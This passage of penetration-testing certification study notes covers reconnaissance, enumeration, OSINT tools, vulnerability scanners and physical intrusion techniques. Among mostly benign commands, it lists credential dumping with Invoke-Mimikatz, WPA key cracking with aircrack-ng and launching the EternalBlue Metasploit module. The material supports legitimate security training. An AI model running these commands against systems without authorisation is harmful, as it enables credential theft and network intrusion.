converting it into unreadable formats. Process-level Remediation: Addresses vulnerabilities within applications and processes. Patch Management: Regularly updates systems to fix known vulnerabilities. Key Rotation: Periodically changes cryptographic keys to limit exposure risks. Certificate Management: Manages digital certificates for secure communications. Secrets Management Solution: Secures sensitive information like passwords and tokens. Network Segmentation: Divides networks into isolated segments to enhance security. Infrastructure Security Controls: Secures physical and virtual infrastructure components. Administrative Controls Role-based Access Control (RBAC) → Notes Secure Software Development Life Cycle (SDLC): Integrates security into the software development process to produce secure software. Minimum Password Requirements: Sets baseline standards for password creation to enhance account security. Policies and Procedures: Establishes a framework for organizational security practices and employee behavior, supported by training and awareness programs. Operational Controls Job Rotation: Reduces risk of fraud and errors by changing employees’ roles periodically. Time-of-Day Restrictions: Limits access to specific times to reduce unauthorized access risks. Mandatory Vacations: Detects and prevents fraudulent activities by requiring regular vacations. User Training: Educates employees on security policies and best practices to reduce human error and enhance overall security. Physical Controls Access Control Vestibule: Controls and monitors entry to secure areas, preventing unauthorized access. Biometric Controls: Authenticates individuals using unique biological characteristics for high security. Video Surveillance: Monitors and records activities to deter unauthorized actions and provide evidence.

Chapter 2 Objective 2.1 Active and Passive Reconnaissance Active Reconnaissance → Actively interacts with the target system or network to gather information. Methods: Port scanning, ping sweeps, banner grabbing, social engineering. Risks: High detection risk, potential legal issues. Importance: Provides detailed and actionable information about the target’s systems and vulnerabilities. Passive Reconnaissance → Gathers information about the target without directly interacting with the target system or network. Methods: OSINT, WHOIS lookup, DNS enumeration, social media monitoring, website analysis. Benefits: Stealthy, reduces legal risk. Importance: Gathers initial information about the target without direct interaction, forming a foundation for further active reconnaissance. Open-Source Intelligence (OSINT) Social Media: Gathers personal and organizational information for social engineering and intelligence. Examples: LinkedIn: Identifying key employees, organizational structure, and technology stack used. Facebook/Twitter: Gathering personal information, behaviors, and affiliations. Importance: Provides insights into potential targets, their roles, and publicly shared information that can be leveraged in social engineering attacks. Job Boards: Identifies technologies and potential vulnerabilities based on job postings. Examples: Indeed/Glassdoor: Reviewing job listings to find out what technologies and skills are sought by the target organization. Importance: Reveals information about the organization’s IT environment, security tools, and potential vulnerabilities based on required skills. Scan Code Repositories: Searches for sensitive information and code vulnerabilities in public repositories. Examples: GitHub/GitLab: Searching for exposed credentials, API keys, or sensitive configuration files. Importance: Uncovers potentially exploitable information and code vulnerabilities that can be used in an attack. Domain Name System (DNS): DNS Lookups: Retrieves domain configuration details. Example: Using nslookup or dig to retrieve A, MX, and CNAME records. Reverse DNS Lookups: Maps IP addresses to domain names. Example: Using host command to find domains pointing to an IP address. Importance: Helps map out the target’s network structure and identify potential entry points. Cached Pages: Accesses historical web page versions to find removed or altered information. Examples: Wayback Machine: Viewing archived versions of a website to find old, possibly insecure configurations or sensitive information. Importance: Provides access to information that has been removed or altered, which can be valuable in understanding historical security practices and changes. Cryptographic Flaws: Identifies weaknesses in encryption implementations. Examples: SSL/TLS Analysis: Using tools like SSL Labs to assess the security of a website’s SSL/TLS configuration. Importance: Detects vulnerabilities in encryption that could be exploited to intercept or manipulate data. Password Dumps: Uses leaked credentials to find potential entry points. Examples: Have I Been Pwned: Checking if the target’s email addresses have been compromised in data breaches. Importance: Provides potential entry points if reused or weak passwords are found in the dumps. Network Reconnaissance Purpose: To gather information about a target network, identifying its structure, devices, services, and potential vulnerabilities. This information is crucial for planning and executing further penetration testing activities. Network Scanning Purpose: Identifies active devices, open ports, and services. Tools: Nmap, Angry IP Scanner. Examples: Scanning a subnet to identify all active hosts. Ping Sweeps Purpose: Discovers active devices using ICMP echo requests. Tools: Fping, Nmap. Examples: Using fping to ping all devices in a subnet. Port Scanning Purpose: Identifies open ports and running services. Tools: Nmap, Masscan. Examples: Performing a SYN scan to identify open ports. OS Fingerprinting Purpose: Determines the operating system of a target device. Tools: Nmap, Xprobe2. Examples: Using Nmap’s OS detection feature. Service Enumeration Purpose: Gathers detailed information about services on open ports. Tools: Nmap, Netcat. Examples: Identifying the version of a web server running on port 80. Network Mapping Purpose: Creates a visual representation of the network topology. Tools: Nmap with Zenmap, SolarWinds Network Topology Mapper. Examples: Visualizing network scan results with Zenmap. DNS Enumeration Purpose: Gathers information about the target’s DNS infrastructure. Tools: DNSRecon, Fierce. Examples: Listing all DNS records for a target domain. Protocol Scanning Purpose: Protocol scanning aims to identify open ports and the services running on them by sending packets to various ports on a target system. It helps in understanding which services are exposed and potentially vulnerable. TCP Scanning Purpose: Identifies open TCP ports and services by analyzing TCP packet responses. Tools: Nmap, Masscan. Types: SYN Scan: Stealthy, sends SYN packets. Connect Scan: Completes the TCP handshake, more detectable. FIN, Xmas, Null Scans: Uses specific TCP flags to elicit responses from closed ports. Examples: nmap -sS target_ip, nmap -sT target_ip. UDP Scanning Purpose: Identifies open UDP ports and services by sending UDP packets and analyzing responses. Tools: Nmap, Unicornscan. Examples: nmap -sU target_ip. Challenges: Less reliable due to stateless nature of UDP and ICMP rate limiting. Certificate Transparency Logs Purpose: Monitors and audits digital certificates issued by Certificate Authorities (CAs) to detect malicious or misissued certificates. Tools: crt.sh: A website for searching Certificate Transparency logs. Google Certificate Transparency: A project providing public logs of issued certificates. Examples: Using crt.sh to find all certificates issued for a target domain. Importance: Helps identify rogue or unexpected certificates, which can indicate potential man-in-the-middle (MITM) attacks or unauthorized domain usage. Information Disclosure Purpose: Identifies unintentional leakage of sensitive information through various channels. Examples: Error Messages: Examining error messages that reveal software versions, paths, or other sensitive details. Metadata: Analyzing document properties for hidden information like author names, software versions, etc. Source Code: Checking for comments in HTML or other code that disclose internal workings or credentials. Importance: Detecting and mitigating information disclosure reduces the risk of attackers leveraging this information for more targeted attacks. Search Engine Analysis/Enumeration Purpose: Uses search engines to find sensitive information or entry points exposed on the web. Tools: Google Dorking: Using advanced search operators to find exposed information. Shodan: Search engine for Internet-connected devices. Examples: Using Google dorks to find publicly accessible login pages or sensitive files. Example: site:example.com inurl:login Importance: Uncovers publicly accessible information that might be overlooked, providing attackers with valuable data. Network Sniffing Purpose: Captures and analyzes network traffic to gather information about the network and the devices on it. Tools: Wireshark: Popular network protocol analyzer. tcpdump: Command-line packet analyzer. Examples: Capturing traffic to identify protocols in use, active devices, and potential vulnerabilities. Importance: Provides insights into network communication patterns, potential vulnerabilities, and security posture. IoT and Operational Technology (OT) Protocols Purpose: Identifies and analyzes protocols used in IoT and OT environments. Examples: Modbus, DNP3: Commonly used in industrial control systems (ICS). MQTT, CoAP: Used in IoT communication. Importance: Understanding these protocols helps in identifying vulnerabilities specific to IoT and OT environments, which are often overlooked but critical for industrial and smart devices. Banner Grabbing Purpose: Collects banners from network services to identify the software and version running on them. Tools: Netcat: Basic network utility for reading from and writing to network connections. Nmap: Supports banner grabbing with service detection. Examples: Using Netcat to connect to an open port and capture the service banner. Command: nc target_ip port Importance: Identifies software versions and configurations, which can be matched against known vulnerabilities for further exploitation. HTML Scraping Purpose: Extracts information from web pages to gather intelligence about the target. Tools: Beautiful Soup: Python library for web scraping. Scrapy: Python framework for web scraping. Examples: Scraping a website for email addresses, internal links, or other useful information. Importance: Automates the process of extracting valuable information from web pages, which can be used for further analysis or attacks. Objective 2.2 Operating System (OS) Fingerprinting Purpose: Determines the operating system of a target device. Tools: Nmap: Includes OS detection capabilities. Xprobe2: Active OS fingerprinting tool. Examples: Using Nmap’s OS detection feature to identify the operating system running on a target server. Command: nmap -O target_ip Importance: Helps tailor further attacks to the specific operating systems identified, improving the chances of successful exploitation. Service Discovery Purpose: Identifies services running on open ports and gathers detailed information about them. Tools: Nmap: Service version detection. Netcat: Versatile tool for interacting with network services. Examples: Using Nmap to identify the version of a web server running on port 80. Command: nmap -sV target_ip Importance: Provides detailed information about the services, including software versions, which can be used to identify known vulnerabilities. Protocol Enumeration Purpose: Identifies and gathers information about the protocols in use on the target network. Tools: Wireshark: Network protocol analyzer. Nmap: Supports various protocol scans. Examples: Using Nmap to scan for specific protocols such as SMB, FTP, and SSH. Command: nmap -sV -p 21,22,139 target_ip Importance: Helps in understanding the communication protocols used, which is crucial for identifying potential vulnerabilities. DNS Enumeration Purpose: Gathers information about the target’s DNS infrastructure. Tools: DNSRecon: DNS enumeration tool. Fierce: DNS reconnaissance tool. Examples: Using DNSRecon to list all DNS records for a target domain. Command: dnsrecon -d target_domain Importance: Identifies domain names, subdomains, and associated IP addresses, which can provide additional targets for further reconnaissance. Directory Enumeration Purpose: Identifies and lists directories and files on web servers. Tools: DirBuster: Web directory scanner. Gobuster: Directory and file brute-forcer. Examples: Using Gobuster to find hidden directories and files on a web server. Command: gobuster dir -u target_url -w wordlist.txt Importance: Helps identify hidden resources that might contain sensitive information or provide entry points for attacks. Host Discovery Purpose: Identifies active hosts on a network. Tools: Nmap: Network scanning tool. Ping Sweep: Using ping to identify live hosts. Examples: Using Nmap to discover hosts on a network. Command: nmap -sn target_subnet Importance: Provides a list of active devices, which can be targeted for further analysis. Share Enumeration Purpose: Identifies shared resources on a network, such as file shares. Tools: SMBclient: Command-line tool for accessing SMB/CIFS resources. enum4linux: Linux tool for enumerating information from Windows systems. Examples: Using SMBclient to list shared resources on a Windows server. Command: smbclient -L //target_ip Importance: Identifies shared resources that might contain sensitive information or provide entry points for attacks. Local User Enumeration Purpose: Identifies user accounts on a target system. Tools: enum4linux: Tool for enumerating information from Windows systems. rpcclient: Command-line tool for interacting with Windows RPC services. Examples: Using enum4linux to list user accounts on a Windows system. Command: enum4linux -U target_ip Importance: Helps in identifying potential user accounts that can be targeted for password attacks or privilege escalation. Email Account Enumeration Purpose: Identifies email accounts associated with a target domain. Tools: theHarvester: Tool for gathering emails, subdomains, and more. Hunter.io: Web service for finding email addresses. Examples: Using theHarvester to find email addresses associated with a target domain. Command: theHarvester -d target_domain -b google Importance: Identifies potential targets for phishing attacks or social engineering. Wireless Enumeration Purpose: Identifies wireless networks and gathers information about them. Tools: Kismet: Wireless network detector, sniffer, and intrusion detection system. Aircrack-ng: Suite of tools for wireless network security. Examples: Using Kismet to discover wireless networks and their configurations. Importance: Helps in identifying wireless networks, their security configurations, and potential vulnerabilities. Permission Enumeration Purpose: Identifies permissions and access controls on resources. Tools: AccessChk: Windows tool for viewing permissions. Linux file permissions commands: Using ls -l to view file permissions. Examples: Using AccessChk to list permissions on a Windows file or directory. Command: accesschk.exe -s target_directory Importance: Helps in identifying overly permissive access controls, which can be exploited for privilege escalation or unauthorized access. Secrets Enumeration Purpose: Identifies sensitive information such as credentials, access keys, and tokens that can be used to gain unauthorized access. Tools: TruffleHog: Searches through git repositories for secrets. AWS IAM Access Analyzer: Identifies permissions and access keys in AWS environments. Examples: Cloud Access Keys: Using TruffleHog to search for AWS keys in a Git repository. Command: trufflehog --regex --entropy=True target_repo_url Passwords: Searching for plaintext passwords in configuration files. API Keys: Identifying API keys in public repositories or code. Session Tokens: Extracting session tokens from intercepted traffic or logs. Importance: Finding and securing secrets prevents unauthorized access and potential data breaches. Attack Path Mapping Purpose: Visualizes the potential paths an attacker could take to exploit vulnerabilities and escalate privileges within a network. Tools: BloodHound: Graph-based tool for analyzing Active Directory trusts. CARTA: Cybersecurity Attack Resiliency & Threat Assessment framework. Examples: Using BloodHound to map relationships and permissions in an Active Directory environment. Command: Invoke-BloodHound -CollectionMethod All Importance: Understanding attack paths helps in identifying and mitigating vulnerabilities before attackers can exploit them. Web Application Firewall (WAF) Enumeration Purpose: Identifies the presence and configuration of web application firewalls protecting web applications. Tools: WAFW00F: Tool to detect and identify WAF products. Examples: Using WAFW00F to identify the type of WAF protecting a web application. Command: wafw00f target_url Origin Address: Bypassing WAF to directly interact with the origin server by discovering its IP address. Techniques: DNS history lookup, SSL certificate analysis. Importance: Understanding WAF configurations helps in planning attacks that can bypass or evade these defenses. Web Crawling Purpose: Automatically traverses and maps a website’s structure, identifying all accessible pages and resources. Tools: Burp Suite: Web vulnerability scanner with crawling capabilities. Scrapy: Python framework for web crawling. Examples: Using Burp Suite to crawl and map a web application. Command: Configure Burp Suite’s spider to target the application. Importance: Comprehensive mapping of a web application aids in identifying hidden or less obvious vulnerabilities. Manual Enumeration Purpose: Manually investigates specific files and configurations to gather information about a target system. Examples: Robots.txt: Checking for disallowed paths that might contain sensitive information. URL: http://target_domain/robots.txt Sitemap: Reviewing the sitemap for a complete list of URLs. URL: http://target_domain/sitemap.xml Platform Plugins: Identifying plugins and extensions used by the web application platform (e.g., WordPress plugins). Techniques: Viewing the HTML source or scanning for known plugin directories. Importance: Manual investigation can reveal specific details that automated tools might miss, providing deeper insights into the target environment. Objective 2.3 Information Gathering Purpose: Collect data about the target. Techniques: Passive and active reconnaissance. Examples: Using theHarvester and Nmap. Data Manipulation Purpose: Process and analyze gathered data. Techniques: Parsing, filtering, transforming. Examples: Python script to parse scan results. Scripting Languages Bash: Automate command-line tasks. Example: Network scan script. Python: Data manipulation and web scraping. Example: Subdomain enumeration script. PowerShell: Windows system administration. Example: Local user enumeration script. Logic Constructs Loops: Repeat code blocks. Examples: For loops in Bash and Python. Conditionals: Execute code based on conditions. Examples: If-else statements in Bash and Python. Operators: Perform logical, string, and arithmetic operations. Arithmetic Operator → Perform mathematical operations. String Operator → Manipulate and compare strings. Boolean Operator → Perform logical operations. Examples: Boolean, string, and arithmetic operators in Bash and Python. Use of Libraries, Functions, and Classes Libraries: Leverage existing functionalities (e.g., requests in Python). Functions: Encapsulate reusable code. Classes: Define data structures and behaviors. Objective 2.4 Wayback Machine Purpose: Archive of web pages; allows viewing of historical versions of websites. Usage: Check past versions of a target site for exposed sensitive information or vulnerabilities. Example: Visiting archive.org to look at past snapshots of target_site.com. Maltego Purpose: Data mining tool; visualizes relationships between people, companies, domains, etc. Maltego is a powerful data mining and link analysis tool developed by Paterva. It is used for gathering and connecting information across various platforms, helping users visualize complex relationships among people, groups, websites, domains, networks, and other entities. Maltego is widely utilized in cybersecurity, open-source intelligence (OSINT), forensic investigations, and threat intelligence. Usage: Generate graphs that display the interconnections between different pieces of information. Example: Using Maltego to map out relationships between email addresses, domains, and social media profiles. Recon-ng Purpose: Open-source web reconnaissance framework. Usage: Automate the process of gathering open-source intelligence. Example: Running modules in Recon-ng to gather email addresses from a domain. Command: recon-ng > marketplace install recon/domains-contacts/whois_pocs Shodan Purpose: Search engine for Internet-connected devices. Usage: Find devices with specific vulnerabilities or configurations. Example: Using Shodan to find all exposed webcams. Command: shodan search "webcamxp" SpiderFoot Purpose: Automated OSINT tool; collects data from various sources. SpiderFoot is an open-source intelligence (OSINT) automation tool used for reconnaissance and information gathering. It automates the process of collecting intelligence on IP addresses, domain names, email addresses, and other entities. SpiderFoot scans multiple data sources to build a detailed profile of the target, making it a valuable tool for penetration testers, security researchers, and threat analysts. Usage: Automate the collection of information about a target. Example: Running a scan in SpiderFoot to gather data on a target domain. Command: python3 spiderfoot.py -s target.com WHOIS Purpose: Look up domain registration information. Usage: Find ownership and contact information for a domain. Example: Using a WHOIS lookup tool to find the registrant’s information for target.com Command: whois target.com nslookup/dig Purpose: DNS lookup utilities. Usage: Retrieve DNS records for a domain. Example: nslookup: nslookup target.com dig: dig target.com Censys.io Purpose: Search engine for internet-connected devices. Usage: Find devices, services, and vulnerabilities. Example: Searching Censys for devices running specific software versions. Hunter.io Purpose: Email address search engine. Usage: Find email addresses associated with a domain. Example: Using Hunter.io to find contact emails for target.com. DNSdumpster Purpose: DNS recon and research tool. DNSdumpster is an online tool that provides comprehensive domain reconnaissance by performing DNS enumeration and gathering information about the DNS infrastructure of a given domain. It helps security researchers, penetration testers, and IT professionals map out the external network infrastructure associated with a domain, including subdomains, mail servers, and other DNS records. Usage: Find DNS records and subdomains for a target. Example: Using DNSdumpster to find subdomains for target.com. Amass Purpose: In-depth DNS enumeration tool. Amass is an open-source tool developed by the OWASP (Open Web Application Security Project) foundation, designed for in-depth network mapping and external asset discovery. It is particularly effective for DNS enumeration, subdomain discovery, and reconnaissance. Amass uses multiple techniques to gather information about a target domain, including active and passive methods, and integrates data from various sources to provide comprehensive results. Usage: Discover subdomains and map out network structures. Example: Running Amass to enumerate subdomains of target.com. Command: amass enum -d target.com Nmap Purpose: Network scanning tool. Usage: Discover hosts and services on a network. Example: Basic Scan: nmap target_ip Nmap Scripting Engine (NSE): Extend Nmap functionality with scripts. Example Script: nmap --script http-enum target_ip theHarvester Purpose: Gather emails, subdomains, hosts, and more from public sources. Usage: OSINT gathering tool. Example: theHarvester -d target.com -b google WiGLE.net Purpose: Wireless network mapping service. WiGLE.net (Wireless Geographic Logging Engine) is an online service that aggregates data on the locations of wireless networks worldwide. It collects information about Wi-Fi networks (SSIDs, BSSIDs, GPS coordinates, etc.) and allows users to search, map, and analyze this data. WiGLE is popular among security researchers, penetration testers, and wireless network enthusiasts for discovering and mapping Wi-Fi networks. Usage: Find and map Wi-Fi networks. Example: Searching WiGLE.net for Wi-Fi networks in a specific area. InSSIDer Purpose: Wi-Fi network scanner. Usage: Identify Wi-Fi networks and their configurations. Example: Using InSSIDer to scan for nearby Wi-Fi networks. OSINTframework.com Purpose: Collection of OSINT tools and resources. Usage: Reference for various OSINT tools. Example: Visiting OSINTframework.com to find tools for a specific type of OSINT task. Wireshark/tcpdump Purpose: Network protocol analyzers. Usage: Capture and analyze network traffic. Example: Wireshark: Using the graphical interface to capture packets. tcpdump: tcpdump -i eth0 -w capture.pcap Aircrack-ng Purpose: Suite of tools for Wi-Fi network security assessment. Usage: Capture and crack WEP/WPA-PSK keys. Example: Capturing packets: airodump-ng wlan0 Cracking a WPA handshake: aircrack-ng -w wordlist.txt -b target_bssid capture_file.cap

Chapter 3 Objective 3.1 Container Scans Purpose: Assess security of containerized applications and environments. Techniques: Sidecar Scans: Utilize a sidecar container to monitor and analyze the security of a main container. Example: A sidecar container running a security tool to check for vulnerabilities in a main application container. Application Scans Purpose: Identify vulnerabilities in applications at different stages of development and deployment. Techniques: Dynamic Application Security Testing (DAST): Test running applications for vulnerabilities by simulating attacks. Example: Using tools like OWASP ZAP to perform DAST on a web application. Interactive Application Security Testing (IAST): Combine elements of DAST and SAST by monitoring the application from within during runtime. Example: Using tools like Contrast Security to identify vulnerabilities as the application runs. Software Composition Analysis (SCA): Analyze third-party and open-source components for known vulnerabilities. Example: Using tools like Snyk or Black Duck to scan dependencies for vulnerabilities. Static Application Security Testing (SAST): Analyze source code for vulnerabilities without executing the code. Example: Using tools like SonarQube or Checkmarx for static code analysis. Subtypes: Infrastructure as Code (IaC): Analyze infrastructure configuration files (e.g., Terraform, CloudFormation) for security issues. Source Code Analysis: Directly examine the application’s source code to find vulnerabilities. Mobile Scan: Assess mobile applications for security vulnerabilities. Example: Using tools like MobSF to scan Android or iOS applications. Network Scans Purpose: Identify vulnerabilities in network devices, services, and configurations. Techniques: TCP/UDP Scan: Scan for open TCP and UDP ports to identify services running on the network. Example: Using Nmap to perform TCP/UDP scans on a target network. Command: nmap -sS -sU target_ip Stealth Scans: Use techniques to avoid detection by network security systems while scanning. Example: Using Nmap’s SYN scan (also known as half-open scan) to perform stealth scans. Command: nmap -sS target_ip Host-Based Scans Purpose: Identify vulnerabilities on individual hosts (e.g., servers, workstations). Techniques: Agent-based: Install an agent on the host to gather detailed information. Example: Using Nessus agents to perform deep scans on hosts. Agentless: Use network protocols (e.g., SMB, SSH) to gather information without installing software. Example: Using OpenVAS to perform remote scans on hosts. Authenticated vs. Unauthenticated Scans Authenticated Scans: Purpose: Perform scans with credentials to get deeper insights into vulnerabilities. Benefits: Access to detailed information such as configuration files, installed software, and patches. Example: Running a credentialed Nessus scan to check for missing patches. Unauthenticated Scans: Purpose: Perform scans without credentials, simulating an external attacker. Benefits: Identify vulnerabilities exposed to unauthenticated users. Example: Using Nmap for a network scan without credentials. Secrets Scanning Purpose: Identify sensitive information such as API keys, passwords, and tokens in source code and configuration files. Techniques: Automated Tools: Use tools specifically designed to find secrets. Example: Using GitGuardian to scan repositories for exposed secrets. Wireless Scans Purpose: Assess security of wireless networks. Techniques: SSID Scanning: Identify and list the SSIDs of nearby wireless networks. Example: Using tools like Kismet to scan for SSIDs. Channel Scanning: Identify which channels wireless networks are operating on. Example: Using tools like WiFi Analyzer to scan channels. Signal Strength Scanning: Measure the signal strength of wireless networks to determine proximity and potential interference. Example: Using tools like NetSpot to map signal strength. Industrial Control Systems (ICS) Vulnerability Assessment Purpose: Identify vulnerabilities in ICS environments, which are critical for industrial operations. Techniques: Manual Assessment: Perform a hands-on review of ICS components and configurations. Example: Conducting a physical and logical assessment of PLCs, SCADA systems, and network configurations. Port Mirroring: Use port mirroring on network switches to capture and analyze ICS traffic without interrupting operations. Example: Setting up port mirroring on a switch to capture ICS traffic for analysis using Wireshark. Tools Nikto Purpose: Web server scanner. Nikto is an open-source web server scanner that performs comprehensive tests against web servers for multiple items, including over 6,700 potentially dangerous files or programs, checks for outdated versions of over 1,250 servers, and version-specific problems on over 270 servers. Nikto is widely used by penetration testers, security researchers, and IT professionals to identify vulnerabilities and misconfigurations in web servers. Usage: Identify potential issues in web servers, such as outdated software, misconfigurations, and vulnerabilities. Example: Scanning a web server for common vulnerabilities. Command: nikto -h http://targetwebsite.com Greenbone/OpenVAS Purpose: Vulnerability scanning and management. Greenbone Vulnerability Manager (GVM), often referred to as OpenVAS (Open Vulnerability Assessment System), is an open-source framework for vulnerability scanning and management. OpenVAS is part of the GVM suite and provides comprehensive vulnerability scanning capabilities. It helps organizations identify security issues, misconfigurations, and vulnerabilities in their networks and systems. Usage: Perform comprehensive vulnerability assessments across networks and systems. Example: Using OpenVAS to scan a network for vulnerabilities. Command: openvas-start to start the service, then configure and run scans through the web interface. TruffleHog Purpose: Secrets detection tool. Usage: Scan repositories for high-entropy strings and secrets such as API keys and passwords. Example: Scanning a Git repository for secrets. Command: trufflehog git https://github.com/target/repo BloodHound Purpose: Active Directory (AD) mapping and exploitation tool. Usage: Identify and analyze AD relationships and permissions that could be exploited. Example: Using BloodHound to map AD relationships and identify attack paths. Command: Invoke-BloodHound -CollectionMethod All in PowerShell to collect data, then analyze with the BloodHound interface. Tenable Nessus Purpose: Comprehensive vulnerability scanner. Tenable Nessus is a widely-used commercial vulnerability scanner designed to assess networks, systems, and applications for security vulnerabilities. Developed by Tenable, Nessus offers robust scanning capabilities, ease of use, and comprehensive reporting. It’s popular among security professionals for identifying, prioritizing, and remediating vulnerabilities in IT environments. Usage: Identify vulnerabilities, misconfigurations, and compliance issues across various systems. Example: Running a vulnerability scan on a network. Command: Configure and start scans through the Nessus web interface. PowerSploit Purpose: Post-exploitation framework for PowerShell. PowerSploit is a collection of PowerShell scripts designed for offensive security and post-exploitation purposes. It is widely used by penetration testers and red teamers to perform various tasks such as reconnaissance, exploitation, persistence, and data exfiltration. PowerSploit leverages the capabilities of PowerShell to interact with the Windows operating system and perform complex tasks. Usage: Perform various post-exploitation tasks such as privilege escalation, credential dumping, and persistence. Example: Using PowerSploit to execute a PowerShell script for dumping credentials. Command: Import-Module PowerSploit; Invoke-Mimikatz Grype Purpose: Vulnerability scanner for container images and filesystems. Grype is an open-source vulnerability scanner for container images and filesystems. Developed by Anchore, it is designed to identify vulnerabilities in container images, making it an essential tool for DevOps and security teams to ensure the security of their containerized applications. Usage: Identify known vulnerabilities in container images. Example: Scanning a Docker image for vulnerabilities. Command: grype docker:targetimage Trivy Purpose: Vulnerability scanner for containers, Kubernetes, and other artifacts. Trivy is a comprehensive and easy-to-use open-source vulnerability scanner for container images, filesystems, and repositories. Developed by Aqua Security, Trivy is known for its speed, accuracy, and simplicity. It supports scanning for OS packages and application dependencies, making it a versatile tool for DevSecOps workflows. Usage: Detect vulnerabilities, misconfigurations, and secrets. Example: Scanning a container image for vulnerabilities. Command: trivy image targetimage Kube-hunter Purpose: Kubernetes security tool. Kube-hunter is an open-source tool designed to perform security assessments on Kubernetes clusters. Developed by Aqua Security, it is used to identify security vulnerabilities and misconfigurations in Kubernetes environments. Kube-hunter is particularly useful for penetration testers, security professionals, and Kubernetes administrators looking to enhance the security of their clusters. Usage: Identify and exploit vulnerabilities in Kubernetes clusters. Example: Running a scan to find vulnerabilities in a Kubernetes cluster. Command: kube-hunter --remote targetclusterip Objective 3.2 Validating Scan, Reconnaissance, and Enumeration Results False Positives Definition: Incorrectly identifying a non-vulnerability as a vulnerability. Example: A scanner flags an outdated software version, but it’s actually patched and secure. Validation: Manually verify the flagged issue to confirm if it’s a real vulnerability. False Negatives Definition: Failing to identify an actual vulnerability. Example: A scanner misses a known SQL injection vulnerability due to misconfiguration. Validation: Cross-check results with other tools or manual testing to ensure comprehensive coverage. True Positives Definition: Correctly identifying a real vulnerability. Example: A scanner detects an open port that is genuinely exposed and vulnerable. Validation: Verify the vulnerability through manual testing or exploitation. Scan Completeness Definition: Ensuring the scan has covered all intended targets and aspects. Example: Verifying all network segments, hosts, and services were scanned. Validation: Review scan logs and reports to ensure no areas were missed. Troubleshooting Scan Configurations Definition: Adjusting scan settings to ensure accurate and complete results. Example: Modifying timeout settings or authentication credentials to ensure thorough scanning. Validation: Perform test scans after configuration changes to verify improved accuracy and completeness. Public Exploit Selection Purpose: Choosing appropriate publicly available exploits to validate vulnerabilities. Sources: Exploit databases such as Exploit-DB, Metasploit, and GitHub repositories. Example: Selecting a Metasploit module to exploit a detected vulnerability. Command: msfconsole, then search and use the relevant module, e.g., use exploit/windows/smb/ms17_010_eternalblue Using Scripting to Validate Results Purpose: Automating the validation of scan, reconnaissance, and enumeration results. Scripting Languages: Python, Bash, PowerShell. Examples: Scripts for cross-checking open ports, vulnerable software versions, and open SMB shares. Objective 3.3 Tailgating Definition: Unauthorized entry by following an authorized person. Prevention: Turnstiles, employee training, security guards. Site Surveys Definition: Assessments of physical security measures. Purpose: Identifying vulnerabilities, recommending improvements, ensuring compliance. USB Drops Definition: Malicious USB devices left in conspicuous places. Purpose: Deliver malware, gain access to data/systems. Prevention: Employee education, strict USB policies, disabling USB ports. Badge Cloning Definition: Duplicating access badges. Purpose: Bypassing access controls. Prevention: Secure badge technologies, multi-factor authentication, regular audits. Lock Picking Definition: Manually opening locks without a key. Purpose: Unauthorized access. Prevention: High-security locks, additional security layers, monitoring.